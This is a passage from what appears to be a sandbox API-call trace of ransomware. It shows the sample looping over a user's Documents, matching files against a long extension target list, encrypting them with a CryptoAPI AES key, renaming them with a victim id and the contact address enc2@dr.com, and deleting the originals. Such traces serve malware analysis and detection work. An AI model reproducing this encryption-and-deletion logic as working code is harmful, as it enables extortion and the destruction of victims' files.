ire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.277] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.278] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.278] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.281] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x2e92, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x2e92, lpOverlapped=0x0) returned 1
	[0185.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.284] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcba18) returned 1
	[0185.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.287] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.287] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.288] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0185.288] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.288] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x2e92, dwBufLen=0x2e92 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x2ea0) returned 1
	[0185.288] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.289] RtlMoveMemory (in: Destination=0xfe0020, Source=0xfdd180, Length=0x2e92 | out: Destination=0xfe0020) 
	[0185.289] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.289] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0020*, pdwDataLen=0x18bc0c*=0x2e92, dwBufLen=0x2ea0 | out: pbData=0xfe0020*, pdwDataLen=0x18bc0c*=0x2ea0) returned 1
	[0185.290] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.290] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0185.290] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.290] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0185.290] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.290] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0185.291] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.291] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.293] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.293] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.294] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 99
	[0185.294] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.295] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe0020*, nNumberOfBytesToWrite=0x2ea0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe0020*, lpNumberOfBytesWritten=0x18c068*=0x2ea0, lpOverlapped=0x0) returned 1
	[0185.298] CloseHandle (hObject=0x2c0) returned 1
	[0185.299] CloseHandle (hObject=0x384) returned 1
	[0185.299] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx")) returned 1
	[0185.306] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx")) returned 0
	[0185.306] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60ed39a0, ftCreationTime.dwHighDateTime=0x1d96867, ftLastAccessTime.dwLowDateTime=0x98715e50, ftLastAccessTime.dwHighDateTime=0x1d96935, ftLastWriteTime.dwLowDateTime=0x98715e50, ftLastWriteTime.dwHighDateTime=0x1d96935, nFileSizeHigh=0x0, nFileSizeLow=0x9676, dwReserved0=0x0, dwReserved1=0x0, cFileName="CgfboyKuyf.pdf", cAlternateFileName="CGFBOY~1.PDF")) returned 1
	[0185.306] lstrcmpW (lpString1="CgfboyKuyf.pdf", lpString2="..") returned 1
	[0185.306] lstrcmpW (lpString1="CgfboyKuyf.pdf", lpString2=".") returned 1
	[0185.306] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.306] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="CgfboyKuyf.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\CgfboyKuyf.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\CgfboyKuyf.pdf"
	[0185.307] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\CgfboyKuyf.pdf") returned 46
	[0185.307] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.308] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\CgfboyKuyf.pdf", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf") returned 0x2e
	[0185.308] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.308] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.308] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf") returned="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf"
	[0185.308] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf") returned 46
	[0185.309] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.309] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.309] StrStrW (lpFirst=".pdf", lpSrch=".") returned=".pdf"
	[0185.309] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.310] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pdf") returned=".pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.310] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.310] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.310] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.315] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x9676, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x9676, lpOverlapped=0x0) returned 1
	[0185.318] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.318] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0185.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.321] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.321] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.322] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0185.322] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.322] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x9676, dwBufLen=0x9676 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x9680) returned 1
	[0185.325] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.325] RtlMoveMemory (in: Destination=0xfe6800, Source=0xfdd180, Length=0x9676 | out: Destination=0xfe6800) 
	[0185.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.325] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe6800*, pdwDataLen=0x18bc0c*=0x9676, dwBufLen=0x9680 | out: pbData=0xfe6800*, pdwDataLen=0x18bc0c*=0x9680) returned 1
	[0185.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.329] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0185.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.329] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0185.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.329] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0185.330] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.330] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.331] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.332] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0185.332] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.332] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe6800*, nNumberOfBytesToWrite=0x9680, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe6800*, lpNumberOfBytesWritten=0x18c068*=0x9680, lpOverlapped=0x0) returned 1
	[0185.338] CloseHandle (hObject=0x2c0) returned 1
	[0185.338] CloseHandle (hObject=0x384) returned 1
	[0185.358] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf")) returned 1
	[0185.367] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cgfboykuyf.pdf")) returned 0
	[0185.368] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1161ecf0, ftCreationTime.dwHighDateTime=0x1d91ff1, ftLastAccessTime.dwLowDateTime=0x83270630, ftLastAccessTime.dwHighDateTime=0x1d95eb3, ftLastWriteTime.dwLowDateTime=0x83270630, ftLastWriteTime.dwHighDateTime=0x1d95eb3, nFileSizeHigh=0x0, nFileSizeLow=0x6524, dwReserved0=0x0, dwReserved1=0x0, cFileName="DdBbJy.docx", cAlternateFileName="DDBBJY~1.DOC")) returned 1
	[0185.368] lstrcmpW (lpString1="DdBbJy.docx", lpString2="..") returned 1
	[0185.368] lstrcmpW (lpString1="DdBbJy.docx", lpString2=".") returned 1
	[0185.368] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.368] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="DdBbJy.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\DdBbJy.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\DdBbJy.docx"
	[0185.368] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\DdBbJy.docx") returned 43
	[0185.368] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.369] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\DdBbJy.docx", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx") returned 0x2b
	[0185.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.369] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.369] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx"
	[0185.371] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx") returned 43
	[0185.371] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.372] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0185.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
